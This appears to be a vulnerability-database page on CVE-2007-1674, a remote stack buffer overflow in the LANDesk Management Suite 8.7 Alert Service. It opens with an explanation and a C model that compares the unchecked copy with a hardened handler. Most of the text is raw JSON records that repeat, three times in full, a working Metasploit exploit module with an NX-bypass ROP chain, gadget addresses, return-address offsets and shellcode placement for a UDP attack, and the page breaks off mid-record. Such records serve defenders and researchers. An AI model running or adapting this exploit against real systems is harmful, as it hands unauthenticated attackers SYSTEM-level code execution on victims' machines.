LANDesk Management Suite automates systems and security management tasks across a network. It runs an Alert Service (Aolnsrvr.exe, the Intel Pro Alerting Proxy) which listens on port 65535/UDP.
Problem
A stack-based buffer overflow in the Alert Service (CVE-2007-1674) allows unauthenticated remote attackers to execute arbitrary code as SYSTEM. Aolnsrvr.exe copies the data it receives into a 268-byte stack buffer with an inline memory copy and no length check, so a longer datagram overwrites the saved return address and the SEH record. LANDesk Management Suite 8.7 is affected; a public Metasploit module exists, including targets that bypass NX on Windows 2003 SP1/SP2 and XP SP2. Apply the vendor hotfix (which removes the Alerting Proxy component) or remove the Intel Pro Alerting Proxy software.
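The TSRT-07-04 advisory quoted further down the page shows the copy loop at the heart of the bug: `shr ecx, 2; rep movsd; and ecx, 3; rep movsb` into a 268-byte stack buffer, driven purely by the size of the received data. The C model below is an added example, not LANDesk's code and not the Metasploit module; it puts that unchecked copy next to a hardened handler that rejects oversized datagrams before touching the stack. The frame layout it assumes (12 bytes of saved registers after the buffer, so the saved return address sits at offset 280) is chosen to match the module's one-shot layout, not taken from a disassembly of Aolnsrvr.exe, and the SEH record the advisory mentions is not modelled. The 284-byte datagram is constructed inline.

```c
/* Added example (not LANDesk or Metasploit code): the unchecked inline copy
 * from TSRT-07-04 next to a hardened handler. Frame layout is an assumption
 * chosen to match the Metasploit module's 280-byte return-address offset. */
#include <inttypes.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ALERT_BUF_SIZE 268u

/* Byte-level model of the handler's stack frame (all char arrays: no padding). */
struct alert_frame {
    unsigned char buf[ALERT_BUF_SIZE];
    unsigned char saved_regs[12];   /* assumed pushed ebx/esi/edi */
    unsigned char ret[4];           /* saved return address at offset 280 */
};

/* Mirrors the advisory's loop: len>>2 dwords (rep movsd), then len&3 bytes
 * (rep movsb). It is length driven, so NUL bytes are copied like any other,
 * which is why gadget addresses such as 0x00401b46 survive the copy. */
static void inline_copy(unsigned char *dst, const unsigned char *src, size_t len)
{
    size_t dwords = len >> 2, tail = len & 3;
    for (size_t i = 0; i < dwords; i++)
        memcpy(dst + 4 * i, src + 4 * i, 4);
    if (tail)
        memcpy(dst + 4 * dwords, src + 4 * dwords, tail);
}

/* Vulnerable: no bounds check, the whole datagram spills past the 268-byte
 * buffer over the saved registers and the return address. The copy goes
 * through the frame's byte view (clamped to the frame) so the model stays
 * defined C; the real handler has no such clamp. Returns bytes copied. */
size_t alert_handle_vulnerable(struct alert_frame *f,
                               const unsigned char *pkt, size_t len)
{
    if (len > sizeof *f)
        len = sizeof *f;
    inline_copy((unsigned char *)f, pkt, len);
    return len;
}

/* Hardened: drop anything longer than the buffer before copying.
 * Returns 0 when copied, -1 when the datagram was rejected. */
int alert_handle_hardened(struct alert_frame *f,
                          const unsigned char *pkt, size_t len)
{
    if (len > ALERT_BUF_SIZE)
        return -1;
    inline_copy(f->buf, pkt, len);
    return 0;
}

/* Read the return-address slot as a little-endian x86 value. */
uint32_t alert_frame_ret(const struct alert_frame *f)
{
    return (uint32_t)f->ret[0] | ((uint32_t)f->ret[1] << 8) |
           ((uint32_t)f->ret[2] << 16) | ((uint32_t)f->ret[3] << 24);
}

/* Constructed 284-byte datagram: 280 filler bytes, then the four bytes that
 * land in the return slot (0xDEADBEEF little-endian). Returns its length. */
size_t build_test_datagram(unsigned char *out, size_t cap)
{
    if (cap < 284)
        return 0;
    memset(out, 'A', 280);
    out[280] = 0xEF; out[281] = 0xBE; out[282] = 0xAD; out[283] = 0xDE;
    return 284;
}

/* Feed the constructed datagram to the vulnerable handler and report what
 * now sits in the return-address slot. */
uint32_t demo_vulnerable_ret(void)
{
    unsigned char pkt[512];
    struct alert_frame f = {{0}};
    alert_handle_vulnerable(&f, pkt, build_test_datagram(pkt, sizeof pkt));
    return alert_frame_ret(&f);
}

/* Same datagram through the hardened handler: returns its rc and, when
 * ret_slot is non-NULL, stores the (untouched) return slot there. */
int demo_hardened(uint32_t *ret_slot)
{
    unsigned char pkt[512];
    struct alert_frame f = {{0}};
    int rc = alert_handle_hardened(&f, pkt, build_test_datagram(pkt, sizeof pkt));
    if (ret_slot)
        *ret_slot = alert_frame_ret(&f);
    return rc;
}

/* 1 when the hardened handler drops the datagram and leaves the slot at 0. */
int demo_hardened_frame_clean(void)
{
    uint32_t slot = 0xffffffffu;
    return demo_hardened(&slot) == -1 && slot == 0;
}

int main(void)
{
    uint32_t slot = 0;
    printf("vulnerable: return slot = 0x%08" PRIx32 "\n", demo_vulnerable_ret());
    int rc = demo_hardened(&slot);
    printf("hardened:   rc=%d, return slot = 0x%08" PRIx32 "\n", rc, slot);
    return 0;
}
```

The point of the model is the control the attacker gets for free: because the copy is sized by the datagram, not terminated by a NUL, every byte of a 1024-byte packet is written, which is what lets the module's NX-bypass chain place gadget addresses with 0x00 high bytes at offsets 280 through 332 and a second handler address at offset 652. The hardened handler's single length comparison is the whole fix; the vendor chose instead to remove the Alerting Proxy component.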
{"id": "SAINT:30DCBC896731FBD4CF542016E45DF1E6", "bulletinFamily": "exploit", "title": "LANDesk Management Suite Alert Service buffer overflow", "description": "Added: 04/23/2007 \nCVE: [CVE-2007-1674](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1674>) \nBID: [23483](<http://www.securityfocus.com/bid/23483>) \nOSVDB: [34964](<http://www.osvdb.org/34964>) \n\n\n### Background\n\n[LANDesk Management Suite](<http://www.landesk.com/SolutionServices/product.aspx?id=716>) automates systems and security management tasks across a network. It runs an Alert Service which listens for communication on port 65535/UDP. \n\n### Problem\n\nA buffer overflow vulnerability in the Alert Service allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply the [hotfix](<http://kb.landesk.com/al/12/4/article.asp?aid=4142&bt=4>). \n\n### References\n\n<http://www.tippingpoint.com/security/advisories/TSRT-07-04.html> \n\n\n### Limitations\n\nExploit works on LANDesk Management Suite 8.7. 
\n\n### Platforms\n\nWindows \n \n\n", "published": "2007-04-23T00:00:00", "modified": "2007-04-23T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/landesk_management_alert", "reporter": "SAINT Corporation", "references": [], "cvelist": ["CVE-2007-1674"], "type": "saint", "lastseen": "2019-06-04T23:19:33", "edition": 4, "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-1674"]}, {"type": "osvdb", "idList": ["OSVDB:34964"]}, {"type": "saint", "idList": ["SAINT:6A16F163E51E2A2CD2966435791BC8BF", "SAINT:2B7129FC7A7C52602762255B22D8DAD2"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/MISC/LANDESK_AOLNSRVR"]}, {"type": "nessus", "idList": ["LANDESK_AOLNSRVR_OVERFLOW.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7581", "SECURITYVULNS:DOC:16707"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83169"]}, {"type": "exploitdb", "idList": ["EDB-ID:29853", "EDB-ID:16457"]}], "modified": "2019-06-04T23:19:33", "rev": 2}, "score": {"value": 10.0, "vector": "NONE", "modified": "2019-06-04T23:19:33", "rev": 2}, "vulnersScore": 10.0}, "scheme": null, "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:31:22", "description": "Stack-based buffer overflow in the Alert Service (aolnsrvr.exe) in LANDesk Management Suite 8.7 allows remote attackers to execute arbitrary code via a crafted packet to port 65535/UDP.", "edition": 4, "cvss3": {}, "published": "2007-04-18T03:19:00", "title": "CVE-2007-1674", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1674"], "modified": "2018-10-16T16:40:00", "cpe": ["cpe:/a:landesk:landesk_management_suite:8.7"], "id": "CVE-2007-1674", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1674", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:landesk:landesk_management_suite:8.7:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2016-10-03T15:01:54", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1674"], "description": "Added: 04/23/2007 \nCVE: [CVE-2007-1674](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1674>) \nBID: [23483](<http://www.securityfocus.com/bid/23483>) \nOSVDB: [34964](<http://www.osvdb.org/34964>) \n\n\n### Background\n\n[LANDesk Management Suite](<http://www.landesk.com/SolutionServices/product.aspx?id=716>) automates systems and security management tasks across a network. It runs an Alert Service which listens for communication on port 65535/UDP. \n\n### Problem\n\nA buffer overflow vulnerability in the Alert Service allows remote attackers to execute arbitrary commands. 
\n\n### Resolution\n\nApply the [hotfix](<http://kb.landesk.com/al/12/4/article.asp?aid=4142&bt=4>). \n\n### References\n\n<http://www.tippingpoint.com/security/advisories/TSRT-07-04.html> \n\n\n### Limitations\n\nExploit works on LANDesk Management Suite 8.7. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2007-04-23T00:00:00", "published": "2007-04-23T00:00:00", "id": "SAINT:6A16F163E51E2A2CD2966435791BC8BF", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/landesk_management_alert", "type": "saint", "title": "LANDesk Management Suite Alert Service buffer overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T17:19:48", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1674"], "edition": 2, "description": "Added: 04/23/2007 \nCVE: [CVE-2007-1674](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1674>) \nBID: [23483](<http://www.securityfocus.com/bid/23483>) \nOSVDB: [34964](<http://www.osvdb.org/34964>) \n\n\n### Background\n\n[LANDesk Management Suite](<http://www.landesk.com/SolutionServices/product.aspx?id=716>) automates systems and security management tasks across a network. It runs an Alert Service which listens for communication on port 65535/UDP. \n\n### Problem\n\nA buffer overflow vulnerability in the Alert Service allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply the [hotfix](<http://kb.landesk.com/al/12/4/article.asp?aid=4142&bt=4>). \n\n### References\n\n<http://www.tippingpoint.com/security/advisories/TSRT-07-04.html> \n\n\n### Limitations\n\nExploit works on LANDesk Management Suite 8.7. 
\n\n### Platforms\n\nWindows \n \n\n", "modified": "2007-04-23T00:00:00", "published": "2007-04-23T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/landesk_management_alert", "id": "SAINT:2B7129FC7A7C52602762255B22D8DAD2", "type": "saint", "title": "LANDesk Management Suite Alert Service buffer overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:19:53", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "LANDesk Management Suite 8.7 Alert Service Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1674"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83169", "href": "https://packetstormsecurity.com/files/83169/LANDesk-Management-Suite-8.7-Alert-Service-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Udp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'LANDesk Management Suite 8.7 Alert Service Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in LANDesk Management Suite 8.7. By sending \nan overly long string to the Alert Service, a buffer is overwritten and arbitrary \ncode can be executed. 
\n}, \n'Author' => 'MC', \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2007-1674'], \n['OSVDB', '34964'], \n['URL', 'http://www.tippingpoint.com/security/advisories/TSRT-07-04.html'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Payload' => \n{ \n'Space' => 336, \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# Aolnsrvr 4.0 \n[ 'Alerting Proxy 2000/2003/XP', { 'Ret' => 0x00423554 } ], \n[ 'Alerting Proxy 2003 SP1-2 (NX support)', { 'IB' => 0x00400000, 'ProcessInfo' => 0xed } ], \n[ 'Alerting Proxy XP SP2 (NX support)', { 'IB' => 0x00400000, 'ProcessInfo' => 0xe4 } ], \n], \n'Privileged' => true, \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Apr 13 2007')) \n \nregister_options([Opt::RPORT(65535)], self.class) \n \nend \n \ndef exploit \nconnect_udp \n \nif (target.name =~ /NX/) \ntxt = Rex::Text.rand_text_alphanumeric(1024) \n \nib = target['IB'] \n \n# to bypass NX we need to emulate the call to ZwSetInformationProcess \n# with generic value (to work on 2k3 SP1-SP2 - XP SP2) \n \n \n# first we set esi to 0xed by getting the value on the stack \n# \n# 0x00401b46: \n# pop esi <- esi = edh \n# retn \n \ntxt[ 280, 4 ] = [ib + 0x1b46].pack('V') \ntxt[ 296, 4] = [0xed].pack('V') \n \n# now we set ecx to 0x7ffe0300, eax to 0xed \n# 0x00401b43: \n# pop ecx <- ecx = 0x7ffe0300 - 0xFF0 \n# mov eax, esi <- eax == edh \n# pop esi <- 0x45b4ea (data section) \n# retn \n \ntxt[ 300, 4] = [ib + 0x1b43].pack('V') \ntxt[ 304, 4] = [0x7ffe0300 - 0xff0].pack('V') \ntxt[ 308, 4] = [ib + 0x5b4ea].pack('V') \n \n# we set edx to 0x7FFe300 (ecx + 0xff0) \n# 0x004106b1: \n# lea edx, [ecx+0ff0h] \n# mov [esi+4], edx \n# mov [esi+8], edi \n# pop edi \n# mov [esi+0Ch], eax \n# pop esi \n# retn \n \ntxt[ 312, 4] = [ib + 0x106b1].pack('V') \n \n \n# finally we call NtSetInformationProcess (-1, target['ProcessInfo'], ib+0x4ec84, 4) \n# 0x0044ec84 is a pointer to 0x2 to disable NX \n# 0x0042a28e: \n# call dword ptr [edx] \n# mov 
esi, eax \n# mov eax, esi \n# pop edi \n# pop esi \n# pop ebp \n# pop ebx \n# add esp, 134h \n# retn 1Ch \n \ntxt[ 324, 4] = [ib + 0x2a28e].pack('V') # call dword ptr[ecx] \ntxt[ 332, 16] = [-1, 34, 0x0044ec84, 4].pack('VVVV') \n \n# we catch the second exception to go back to our shellcode, now that \n# NX is disabled \n \ntxt[ 652, 4 ] = [ib + 0x23554].pack('V') # (jmp esp in atl.dll) \ntxt[ 684, payload.encoded.length ] = payload.encoded \n \nelse \n# One-shot overwrite =( \ntxt = rand_text_alphanumeric(280) + [target.ret].pack('V') + payload.encoded \nend \n \nprint_status(\"Trying target #{target.name}...\") \n \nudp_sock.put(txt) \n \nhandler(udp_sock) \ndisconnect_udp \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83169/landesk_aolnsrvr.rb.txt"}], "osvdb": [{"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "cvelist": ["CVE-2007-1674"], "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://kb.landesk.com/display/4n/kb/article.asp?aid=4142\nSecurity Tracker: 1017912\n[Secunia Advisory ID:24892](https://secuniaresearch.flexerasoftware.com/advisories/24892/)\nOther Advisory URL: http://www.tippingpoint.com/security/advisories/TSRT-07-04.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0212.html\nKeyword: UDP port 65535\nISS X-Force ID: 33657\nFrSIRT Advisory: ADV-2007-1391\n[CVE-2007-1674](https://vulners.com/cve/CVE-2007-1674)\nBugtraq ID: 23483\n", "edition": 1, "modified": "2007-04-13T05:19:07", "published": "2007-04-13T05:19:07", "href": "https://vulners.com/osvdb/OSVDB:34964", "id": "OSVDB:34964", "title": "LANDesk Management Suite Alert Service (aolnsrvr.exe) Remote Overflow", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": 
[{"lastseen": "2020-07-02T22:31:48", "description": "This module exploits a stack buffer overflow in LANDesk Management Suite 8.7. By sending an overly long string to the Alert Service, a buffer is overwritten and arbitrary code can be executed.\n", "published": "2007-04-15T00:46:09", "type": "metasploit", "title": "LANDesk Management Suite 8.7 Alert Service Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1674"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/MISC/LANDESK_AOLNSRVR", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Udp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'LANDesk Management Suite 8.7 Alert Service Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in LANDesk Management Suite 8.7. 
By sending\n an overly long string to the Alert Service, a buffer is overwritten and arbitrary\n code can be executed.\n },\n 'Author' => 'MC',\n 'References' =>\n [\n ['CVE', '2007-1674'],\n ['OSVDB', '34964'],\n ['URL', 'http://www.tippingpoint.com/security/advisories/TSRT-07-04.html'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Payload' =>\n {\n 'Space' => 336,\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Aolnsrvr 4.0\n [ 'Alerting Proxy 2000/2003/XP', { 'Ret' => 0x00423554 } ],\n [ 'Alerting Proxy 2003 SP1-2 (NX support)', { 'IB' => 0x00400000, 'ProcessInfo' => 0xed } ],\n [ 'Alerting Proxy XP SP2 (NX support)', { 'IB' => 0x00400000, 'ProcessInfo' => 0xe4 } ],\n ],\n 'Privileged' => true,\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Apr 13 2007'))\n\n register_options([Opt::RPORT(65535)])\n end\n\n def exploit\n connect_udp\n\n if (target.name =~ /NX/)\n txt = Rex::Text.rand_text_alphanumeric(1024)\n\n ib = target['IB']\n\n # to bypass NX we need to emulate the call to ZwSetInformationProcess\n # with generic value (to work on 2k3 SP1-SP2 - XP SP2)\n\n\n # first we set esi to 0xed by getting the value on the stack\n #\n # 0x00401b46:\n # pop esi <- esi = edh\n # retn\n\n txt[ 280, 4 ] = [ib + 0x1b46].pack('V')\n txt[ 296, 4] = [0xed].pack('V')\n\n # now we set ecx to 0x7ffe0300, eax to 0xed\n # 0x00401b43:\n # pop ecx <- ecx = 0x7ffe0300 - 0xFF0\n # mov eax, esi <- eax == edh\n # pop esi <- 0x45b4ea (data section)\n # retn\n\n txt[ 300, 4] = [ib + 0x1b43].pack('V')\n txt[ 304, 4] = [0x7ffe0300 - 0xff0].pack('V')\n txt[ 308, 4] = [ib + 0x5b4ea].pack('V')\n\n # we set edx to 0x7FFe300 (ecx + 0xff0)\n # 0x004106b1:\n # lea edx, [ecx+0ff0h]\n # mov [esi+4], edx\n # mov [esi+8], edi\n # pop edi\n # mov [esi+0Ch], eax\n # pop esi\n # retn\n\n txt[ 312, 4] = [ib + 0x106b1].pack('V')\n\n\n # finally we call NtSetInformationProcess (-1, target['ProcessInfo'], ib+0x4ec84, 4)\n # 0x0044ec84 is a pointer to 0x2 to 
disable NX\n # 0x0042a28e:\n # call dword ptr [edx]\n # mov esi, eax\n # mov eax, esi\n # pop edi\n # pop esi\n # pop ebp\n # pop ebx\n # add esp, 134h\n # retn 1Ch\n\n txt[ 324, 4] = [ib + 0x2a28e].pack('V') # call dword ptr[ecx]\n txt[ 332, 16] = [-1, 34, 0x0044ec84, 4].pack('VVVV')\n\n # we catch the second exception to go back to our shellcode, now that\n # NX is disabled\n\n txt[ 652, 4 ] = [ib + 0x23554].pack('V') # (jmp esp in atl.dll)\n txt[ 684, payload.encoded.length ] = payload.encoded\n\n else\n # One-shot overwrite =(\n txt = rand_text_alphanumeric(280) + [target.ret].pack('V') + payload.encoded\n end\n\n print_status(\"Trying target #{target.name}...\")\n\n udp_sock.put(txt)\n\n handler(udp_sock)\n disconnect_udp\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/landesk_aolnsrvr.rb"}], "exploitdb": [{"lastseen": "2016-02-03T11:16:00", "description": "LanDesk Management Suite 8.7 Alert Service AOLSRVR.EXE Buffer Overflow Vulnerability. CVE-2007-1674. Remote exploit for windows platform", "published": "2007-04-13T00:00:00", "type": "exploitdb", "title": "LanDesk Management Suite 8.7 Alert Service AOLSRVR.EXE Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1674"], "modified": "2007-04-13T00:00:00", "id": "EDB-ID:29853", "href": "https://www.exploit-db.com/exploits/29853/", "sourceData": "source: http://www.securityfocus.com/bid/23483/info\r\n\r\nLANDesk Management Suite is prone to a remote stack-based buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.\r\n\r\nAn attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successfully exploiting this issue would result in the complete compromise of affected computers. 
Failed exploit attempts will result in a denial of service.\r\n\r\nThis issue affects LANDesk Management Suite 8.7; prior versions may also be affected. \r\n\r\n##\r\n# $Id: landesk_aolnsrvr.rb 4886 2007-05-07 04:48:45Z hdm $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to \r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/projects/Framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\nmodule Msf\r\n\r\nclass Exploits::Windows::Misc::Landesk_Aolnsrvr < Msf::Exploit::Remote\r\n\r\n\tinclude Exploit::Remote::Udp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'LANDesk Management Suite 8.7 Alert Service Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a stack overflow in LANDesk Management Suite 8.7. By sending\r\n\t\t\t\tan overly long string to the Alert Service, a buffer is overwritten and arbitrary\r\n\t\t\t\tcode can be executed.\r\n\t\t\t},\r\n\t\t\t'Author' => 'MC',\r\n\t\t\t'Version' => '$Revision: 4886 $',\r\n\t\t\t'References' => \r\n\t\t\t\t[ \r\n\t\t\t\t\t['CVE', '2007-1674'],\r\n\t\t\t\t\t['URL', 'http://www.tippingpoint.com/security/advisories/TSRT-07-04.html'],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 336,\r\n\t\t\t\t\t'StackAdjustment' => -3500,\t\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# Aolnsrvr 4.0\r\n\t\t\t\t\t[ 'Alerting Proxy 2000/2003/XP', { 'Ret' => 0x00423554 } ],\r\n\t\t\t\t\t[ 'Alerting Proxy 2003 SP1-2 (NX support)', { 'IB' => 0x00400000, 'ProcessInfo' => 0xed } ],\r\n\t\t\t\t\t[ 'Alerting Proxy XP SP2 (NX support)', { 'IB' => 0x00400000, 'ProcessInfo' => 0xe4 } ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultTarget' 
=> 0,\r\n\t\t\t'DisclosureDate' => 'Apr 13 2007'))\r\n\r\n\t\t\tregister_options([Opt::RPORT(65535)], self.class)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect_udp\r\n\r\n\t\tif (target.name =~ /NX/)\r\n\t\t\ttxt = Rex::Text.rand_text_alphanumeric(1024)\r\n\r\n\t\t\tib = target['IB']\r\n\r\n\t\t\t# to bypass NX we need to emulate the call to ZwSetInformationProcess\r\n\t\t\t# with generic value (to work on 2k3 SP1-SP2 - XP SP2)\r\n\r\n\r\n\t\t\t# first we set esi to 0xed by getting the value on the stack\r\n\t\t\t#\r\n\t\t\t# 0x00401b46:\r\n\t\t\t# pop esi <- esi = edh\r\n\t\t\t# retn\r\n\r\n\t\t\ttxt[ 280, 4 ] = [ib + 0x1b46].pack('V')\r\n\t\t\ttxt[ 296, 4] = [0xed].pack('V')\r\n\r\n\t\t\t# now we set ecx to 0x7ffe0300, eax to 0xed\r\n\t\t\t# 0x00401b43:\r\n\t\t\t# pop ecx <- ecx = 0x7ffe0300 - 0xFF0\r\n\t\t\t# mov eax, esi <- eax == edh\r\n\t\t\t# pop esi <- 0x45b4ea (data section)\r\n\t\t\t# retn\r\n\r\n\t\t\ttxt[ 300, 4] = [ib + 0x1b43].pack('V')\r\n\t\t\ttxt[ 304, 4] = [0x7ffe0300 - 0xff0].pack('V')\r\n\t\t\ttxt[ 308, 4] = [ib + 0x5b4ea].pack('V')\r\n\r\n\t\t\t# we set edx to 0x7FFe300 (ecx + 0xff0)\r\n\t\t\t# 0x004106b1:\r\n\t\t\t# lea edx, [ecx+0ff0h]\r\n\t\t\t# mov [esi+4], edx\r\n\t\t\t# mov [esi+8], edi\r\n\t\t\t# pop edi\r\n\t\t\t# mov [esi+0Ch], eax\r\n\t\t\t# pop esi\r\n\t\t\t# retn\r\n\t\t\t\r\n\t\t\ttxt[ 312, 4] = [ib + 0x106b1].pack('V')\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t# finally we call NtSetInformationProcess (-1, target['ProcessInfo'], ib+0x4ec84, 4)\r\n\t\t\t# 0x0044ec84 is a pointer to 0x2 to disable NX\r\n\t\t\t# 0x0042a28e:\r\n\t\t\t# call dword ptr [edx]\r\n\t\t\t# mov esi, eax\r\n\t\t\t# mov eax, esi\r\n\t\t\t# pop edi\r\n\t\t\t# pop esi\r\n\t\t\t# pop ebp\r\n\t\t\t# pop ebx\r\n\t\t\t# add esp, 134h\r\n\t\t\t# retn 1Ch\r\n\r\n\t\t\ttxt[ 324, 4] = [ib + 0x2a28e].pack('V') # call dword ptr[ecx]\r\n\t\t\ttxt[ 332, 16] = [-1, 34, 0x0044ec84, 4].pack('VVVV')\r\n\r\n\t\t\t# we catch the second exception to go back to our shellcode, now 
that\r\n\t\t\t# NX is disabled\r\n\r\n\t\t\ttxt[ 652, 4 ] = [ib + 0x23554].pack('V') # (jmp esp in atl.dll)\r\n\t\t\ttxt[ 684, payload.encoded.length ] = payload.encoded\r\n\r\n\t\telse\r\n\t\t\t# One-shot overwrite =(\r\n\t\t\ttxt = rand_text_alphanumeric(280) + [target.ret].pack('V') + payload.encoded\r\n\t\tend\r\n\t\t\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\t\t\t\r\n\t\tudp_sock.put(txt)\r\n\t\t\r\n\t\thandler(udp_sock)\r\n\t\tdisconnect_udp\t\t\r\n\tend\r\n\r\nend\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/29853/"}, {"lastseen": "2016-02-01T23:54:50", "description": "LANDesk Management Suite 8.7 Alert Service Buffer Overflow. CVE-2007-1674. Remote exploit for windows platform", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "LANDesk Management Suite 8.7 Alert Service Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1674"], "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16457", "href": "https://www.exploit-db.com/exploits/16457/", "sourceData": "##\r\n# $Id: landesk_aolnsrvr.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Udp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'LANDesk Management Suite 8.7 Alert Service Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a stack buffer overflow in LANDesk Management Suite 8.7. 
